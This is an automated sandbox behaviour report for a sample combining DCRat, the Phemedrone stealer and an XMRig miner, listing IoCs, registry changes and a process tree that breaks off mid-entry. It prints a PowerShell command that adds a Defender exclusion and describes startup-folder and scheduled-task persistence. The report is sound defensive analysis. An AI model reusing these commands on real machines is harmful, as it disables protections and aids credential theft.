phemedrone | de08c69d06b2f176058aa6001b9f9195ef9599f1f79b783e21762046258583d3

Analysis

max time kernel
128s
max time network
164s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
02/03/2024, 20:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dcrat/123.bat
Size

66B
MD5

572472c7cc450eedfcd8061e7f64eb96
SHA1

6d315e5521592f668dc2899eaa83f2ac9cbe99c4
SHA256

b449f5170c97f7328ce8ff6f2d741c489de4fc9640dcd1a4781349c60f25d934
SHA512

f89b64c7300aa52b1bba95f1a45fb1dcc1ef13ed81bb0e671159120f909bba94a9762de9c78056f1f535e2797efffa689e6e10b73ca3a0997b307361619883b6

Score

10^/10

phemedrone xmrig miner spyware stealer

Malware Config

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/4964-4314-0x00000000000E0000-0x0000000000BF1000-memory.dmp	xmrig
behavioral1/memory/4964-4317-0x00000000000E0000-0x0000000000BF1000-memory.dmp	xmrig

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe	SetupTcpipDriver.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe	SetupTcpipDriver.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe	regedit.exe

Executes dropped EXE 18 IoCs

pid	Process
2780	DCRatLauncher.exe
2680	SetupUDPDriver.exe
1680	Hyfatok.exe
944	SetupTCPIP6Driver.exe
2316	SetupTcpipDriver.exe
2212	regedit.exe
2512	CL_Debug_Log.txt
320	Helper.exe
2276	Helper.exe
1000	Helper.exe
2728	Helper.exe
664	Helper.exe
2816	tor.exe
4608	Helper.exe
4684	Helper.exe
4276	Helper.exe
4412	Helper.exe
4260	Helper.exe

Loads dropped DLL 13 IoCs

pid	Process
2680	SetupUDPDriver.exe
436	taskeng.exe
436	taskeng.exe
540	Process not Found
1000	Helper.exe
1000	Helper.exe
2816	tor.exe
2816	tor.exe
2816	tor.exe
2816	tor.exe
2816	tor.exe
2816	tor.exe
4456	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

AutoIT Executable 20 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000c00000001224c-44.dat	autoit_exe
behavioral1/files/0x000c00000001224c-43.dat	autoit_exe
behavioral1/files/0x000c00000001224c-45.dat	autoit_exe
behavioral1/files/0x000400000001d97a-202.dat	autoit_exe
behavioral1/files/0x000400000001d978-228.dat	autoit_exe
behavioral1/files/0x000400000001d984-756.dat	autoit_exe
behavioral1/files/0x000400000001d984-758.dat	autoit_exe
behavioral1/files/0x000400000001d984-760.dat	autoit_exe
behavioral1/files/0x000400000001d984-757.dat	autoit_exe
behavioral1/files/0x000400000001d984-762.dat	autoit_exe
behavioral1/files/0x000400000001d984-761.dat	autoit_exe
behavioral1/files/0x000400000001d984-764.dat	autoit_exe
behavioral1/files/0x000400000001d984-765.dat	autoit_exe
behavioral1/files/0x000400000001d984-771.dat	autoit_exe
behavioral1/files/0x000400000001d984-772.dat	autoit_exe
behavioral1/files/0x000400000001d984-3825.dat	autoit_exe
behavioral1/files/0x000400000001d984-3837.dat	autoit_exe
behavioral1/files/0x000400000001d984-3959.dat	autoit_exe
behavioral1/files/0x000400000001d984-3964.dat	autoit_exe
behavioral1/files/0x000400000001d984-4287.dat	autoit_exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\System32\SetupTCPIP6Driver.exe	DCRat.exe
File opened for modification	C:\Windows\System32\SetupTCPIP6Driver.exe	DCRat.exe
File created	C:\Windows\System32\SetupTcpipDriver.exe	DCRat.exe
File opened for modification	C:\Windows\System32\SetupTcpipDriver.exe	DCRat.exe
File opened for modification	C:\Windows\System32\SetupTcpipDriver.exe	SetupTcpipDriver.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1000 set thread context of 664	1000	Helper.exe	208
PID 1000 set thread context of 4260	1000	Helper.exe	437
PID 1000 set thread context of 4964	1000	Helper.exe	455

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1132	schtasks.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4636	timeout.exe
4844	timeout.exe
1132	timeout.exe
1132	timeout.exe
3808	timeout.exe
908	timeout.exe
3720	timeout.exe
3956	timeout.exe
1940	timeout.exe
2688	timeout.exe
3316	timeout.exe
3880	timeout.exe
3936	timeout.exe
3516	timeout.exe
4248	timeout.exe
2288	timeout.exe
2208	timeout.exe
2268	timeout.exe
4036	timeout.exe
2728	timeout.exe
1676	timeout.exe
1600	timeout.exe
3348	timeout.exe
4024	timeout.exe
4256	timeout.exe
3404	timeout.exe
4824	timeout.exe
4992	timeout.exe
3900	timeout.exe
2688	timeout.exe
4436	timeout.exe
3664	timeout.exe
3732	timeout.exe
5112	timeout.exe
684	timeout.exe
320	timeout.exe
2168	timeout.exe
1944	timeout.exe
1600	timeout.exe
2376	timeout.exe
3956	timeout.exe
644	timeout.exe
3648	timeout.exe
4624	timeout.exe
1584	timeout.exe
744	timeout.exe
3532	timeout.exe
3884	timeout.exe
3288	timeout.exe
4592	timeout.exe
1000	timeout.exe
4544	timeout.exe
4980	timeout.exe
3020	timeout.exe
4312	timeout.exe
4412	timeout.exe
924	timeout.exe
4200	timeout.exe
4580	timeout.exe
3080	timeout.exe
3148	timeout.exe
3852	timeout.exe
4448	timeout.exe
4652	timeout.exe

Modifies Internet Explorer settings 1 TTPs 62 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "415574677"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "42"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "122"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "224"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "229"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "42"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "22"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "276"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000c0785fc4c4b4c22eba1295aed9eb42a27d97b3c3ba345227f9209ca9c7eb5bd2000000000e8000000002000020000000a8d0df371e9db2578ef355cc9d4ec6fad20288e2d64cab96a9a4b858d0fbcafa2000000015976cfb12d284f8bb977a7c045db2ea24cf34e0d6a64ab4e53cb837db00a59140000000af7b208dd56ccae9aa7e9e32e83be9f32df0c13c4bab7ef828d42b183b1744d4dee9de0dd932f12610824519fe6e9db92d9d95b045fbbde8a0a1172ea078a407	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "22"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70a852c7e36cda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "229"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "42"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EA89FA01-D8D6-11EE-9F3E-D2EFD46A7D0E} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "122"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "276"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "224"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "229"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "276"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "224"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "122"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b0000000002000000000010660000000100002000000083c688f0d02a45d06e7ae6f427f1f1cdd4c31fce76fd8ecf0ea60972940c862f000000000e80000000020000200000005689ac50cd68b91ad2fc5edefbb6101918f9d32aa40c5be662c2ea6fe097913b40010000a93216e3d1d8cee8305141f95be7b529116932b7811cd17b8dc8fb23e151dddb60dc68bc1969385c547153d6e2f44987eb7d8193a84e19fb1342f280ce1c6b1e10c0accb31324f77b466836dffefb2ee633810a13da50bc11ea68c7d108bcb8205e932a62999b97fb332d764880b8742899d76990799167dc9dd54bc3c7b90f780dcc2db274abc3a1dc0edd4cd3a75012e23165a3d21355579a007c3dc2690b5928621b517f3ee776ec080475e2c01ee1d15ad830364f9da85bed16411ad08a7447d582b0c663fc2aba7c0d0fd5fcc6bfb02e873d3ca6e019ed454cd4b5b857c3ab55d127d388d5370cf3fed5cb16dadafa8f722716a6e1548214ff852973de7d3df2c688feae9e40dbec56a9a8f1896f8a8f61f5f83eca5448882e5e14f9dd8c30abf05da00aa053ebbf253ecf249906443838a65ea0d4a1755817d48af8a1f4000000016979a2777e74b22722782cf20757e9d38e708050b938651ef6a7255c262aeb58f4e03b14c4f40fbef00308db9add9abb650e436e124987389b76e5c043de895	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "22"	IEXPLORE.EXE

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\dcrat\winmgmts:\KXIPPCKF\root\CIMV2	SetupUDPDriver.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\root\cimv2	Helper.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\KXIPPCKF\root\CIMV2	Helper.exe

Runs regedit.exe 1 IoCs

pid	Process
2212	regedit.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	91	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2532	DCRat.exe
2532	DCRat.exe
2532	DCRat.exe
2576	powershell.exe
2804	powershell.exe
2792	powershell.exe
1680	Hyfatok.exe
1512	powershell.exe
1868	powershell.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	2532	DCRat.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	1680	Hyfatok.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeRestorePrivilege	2512	CL_Debug_Log.txt
Token: 35	2512	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2512	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2512	CL_Debug_Log.txt
Token: SeRestorePrivilege	664	Helper.exe
Token: 35	664	Helper.exe
Token: SeSecurityPrivilege	664	Helper.exe
Token: SeSecurityPrivilege	664	Helper.exe
Token: SeRestorePrivilege	4260	Helper.exe
Token: 35	4260	Helper.exe
Token: SeSecurityPrivilege	4260	Helper.exe
Token: SeSecurityPrivilege	4260	Helper.exe
Token: SeLockMemoryPrivilege	4964	attrib.exe
Token: SeLockMemoryPrivilege	4964	attrib.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2448	iexplore.exe
320	Helper.exe
320	Helper.exe
320	Helper.exe
2276	Helper.exe
2276	Helper.exe
2276	Helper.exe
1000	Helper.exe
1000	Helper.exe
1000	Helper.exe
2728	Helper.exe
2728	Helper.exe
2728	Helper.exe
4684	Helper.exe
4684	Helper.exe
4684	Helper.exe
4608	Helper.exe
4608	Helper.exe
4608	Helper.exe
4412	Helper.exe
4412	Helper.exe
4412	Helper.exe
4276	Helper.exe
4276	Helper.exe
4276	Helper.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
2680	SetupUDPDriver.exe
320	Helper.exe
320	Helper.exe
320	Helper.exe
2276	Helper.exe
2276	Helper.exe
2276	Helper.exe
1000	Helper.exe
1000	Helper.exe
1000	Helper.exe
2728	Helper.exe
2728	Helper.exe
2728	Helper.exe
4684	Helper.exe
4684	Helper.exe
4684	Helper.exe
4608	Helper.exe
4608	Helper.exe
4608	Helper.exe
4412	Helper.exe
4412	Helper.exe
4412	Helper.exe
4276	Helper.exe
4276	Helper.exe
4276	Helper.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2448	iexplore.exe
2448	iexplore.exe
1556	IEXPLORE.EXE
1556	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 2532	2228	cmd.exe	29
PID 2228 wrote to memory of 2532	2228	cmd.exe	29
PID 2228 wrote to memory of 2532	2228	cmd.exe	29
PID 2532 wrote to memory of 2576	2532	DCRat.exe	31
PID 2532 wrote to memory of 2576	2532	DCRat.exe	31
PID 2532 wrote to memory of 2576	2532	DCRat.exe	31
PID 2532 wrote to memory of 2780	2532	DCRat.exe	35
PID 2532 wrote to memory of 2780	2532	DCRat.exe	35
PID 2532 wrote to memory of 2780	2532	DCRat.exe	35
PID 2532 wrote to memory of 2780	2532	DCRat.exe	35
PID 2532 wrote to memory of 2780	2532	DCRat.exe	35
PID 2532 wrote to memory of 2780	2532	DCRat.exe	35
PID 2532 wrote to memory of 2780	2532	DCRat.exe	35
PID 2532 wrote to memory of 2804	2532	DCRat.exe	36
PID 2532 wrote to memory of 2804	2532	DCRat.exe	36
PID 2532 wrote to memory of 2804	2532	DCRat.exe	36
PID 2780 wrote to memory of 2448	2780	DCRatLauncher.exe	38
PID 2780 wrote to memory of 2448	2780	DCRatLauncher.exe	38
PID 2780 wrote to memory of 2448	2780	DCRatLauncher.exe	38
PID 2780 wrote to memory of 2448	2780	DCRatLauncher.exe	38
PID 2532 wrote to memory of 2680	2532	DCRat.exe	39
PID 2532 wrote to memory of 2680	2532	DCRat.exe	39
PID 2532 wrote to memory of 2680	2532	DCRat.exe	39
PID 2532 wrote to memory of 2680	2532	DCRat.exe	39
PID 2532 wrote to memory of 2680	2532	DCRat.exe	39
PID 2532 wrote to memory of 2680	2532	DCRat.exe	39
PID 2532 wrote to memory of 2680	2532	DCRat.exe	39
PID 2532 wrote to memory of 2792	2532	DCRat.exe	40
PID 2532 wrote to memory of 2792	2532	DCRat.exe	40
PID 2532 wrote to memory of 2792	2532	DCRat.exe	40
PID 2448 wrote to memory of 1556	2448	iexplore.exe	43
PID 2448 wrote to memory of 1556	2448	iexplore.exe	43
PID 2448 wrote to memory of 1556	2448	iexplore.exe	43
PID 2448 wrote to memory of 1556	2448	iexplore.exe	43
PID 2448 wrote to memory of 1556	2448	iexplore.exe	43
PID 2448 wrote to memory of 1556	2448	iexplore.exe	43
PID 2448 wrote to memory of 1556	2448	iexplore.exe	43
PID 2532 wrote to memory of 1680	2532	DCRat.exe	44
PID 2532 wrote to memory of 1680	2532	DCRat.exe	44
PID 2532 wrote to memory of 1680	2532	DCRat.exe	44
PID 2532 wrote to memory of 1512	2532	DCRat.exe	45
PID 2532 wrote to memory of 1512	2532	DCRat.exe	45
PID 2532 wrote to memory of 1512	2532	DCRat.exe	45
PID 2532 wrote to memory of 944	2532	DCRat.exe	48
PID 2532 wrote to memory of 944	2532	DCRat.exe	48
PID 2532 wrote to memory of 944	2532	DCRat.exe	48
PID 2532 wrote to memory of 944	2532	DCRat.exe	48
PID 2532 wrote to memory of 944	2532	DCRat.exe	48
PID 2532 wrote to memory of 944	2532	DCRat.exe	48
PID 2532 wrote to memory of 944	2532	DCRat.exe	48
PID 2532 wrote to memory of 1868	2532	DCRat.exe	49
PID 2532 wrote to memory of 1868	2532	DCRat.exe	49
PID 2532 wrote to memory of 1868	2532	DCRat.exe	49
PID 2532 wrote to memory of 2316	2532	DCRat.exe	122
PID 2532 wrote to memory of 2316	2532	DCRat.exe	122
PID 2532 wrote to memory of 2316	2532	DCRat.exe	122
PID 2316 wrote to memory of 2212	2316	SetupTcpipDriver.exe	52
PID 2316 wrote to memory of 2212	2316	SetupTcpipDriver.exe	52
PID 2316 wrote to memory of 2212	2316	SetupTcpipDriver.exe	52
PID 2228 wrote to memory of 2160	2228	cmd.exe	53
PID 2228 wrote to memory of 2160	2228	cmd.exe	53
PID 2228 wrote to memory of 2160	2228	cmd.exe	53
PID 2680 wrote to memory of 2512	2680	SetupUDPDriver.exe	54
PID 2680 wrote to memory of 2512	2680	SetupUDPDriver.exe	54

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4964	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\dcrat\123.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Users\Admin\AppData\Local\Temp\dcrat\DCRat.exe
  DCRat.exe
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dcrat\DCRatLauncher.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2576
- - C:\Users\Admin\AppData\Local\Temp\dcrat\DCRatLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\dcrat\DCRatLauncher.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://java.com/download
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2448
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2448 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
